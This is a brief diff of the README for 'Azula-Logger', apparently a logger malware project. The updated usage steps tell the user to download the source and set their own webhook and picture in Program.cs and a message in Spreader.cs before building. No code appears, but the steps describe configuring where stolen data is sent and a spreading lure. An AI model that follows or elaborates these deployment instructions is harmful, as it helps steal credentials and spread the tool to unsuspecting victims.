CythosaSec/Azula-Logger/README.md

 # Usage

-You download the source code and modify it with your webhook/...
+You download the source code and modify it with your webhook, picture and message

+webhook and picture: Program.cs

+message: Spreader.cs

 You Build the Source